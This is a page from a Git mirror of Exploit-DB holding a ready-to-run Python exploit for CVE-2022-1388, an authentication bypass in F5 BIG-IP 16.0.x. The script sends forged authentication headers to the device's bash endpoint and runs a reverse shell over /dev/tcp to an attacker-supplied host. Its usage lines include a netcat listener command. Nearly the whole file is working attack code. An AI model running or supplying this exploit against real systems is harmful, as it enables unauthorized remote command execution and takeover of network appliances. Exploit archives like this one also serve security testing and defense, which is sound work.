bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/50932.py
Offensive Security 6b9b8c5434 DB: 2022-05-13 
7 changes to exploits/shellcodes

Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)
F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
College Management System 1.0 - 'course_code' SQL Injection (Authenticated)
Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
TLR-2005KSH - Arbitrary File Delete
2022-05-13 05:01:39 +00:00

66 lines
No EOL
1.8 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ ___ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ <
| |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |
\_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')
def exploit(url, lhost, lport):
url = url + 'mgmt/tm/util/bash'
data = {
"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
}
headers = {
'Authorization': 'Basic YWRtaW46',
'Connection':'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token': '0'
}
s = Session()
req = Request('POST', url, json=data, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15
)
#print(prepped.headers)
#print(url)
#print(resp.headers)
#print(resp.json())
print(resp.status_code)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
Reference in a new issue View git blame Copy permalink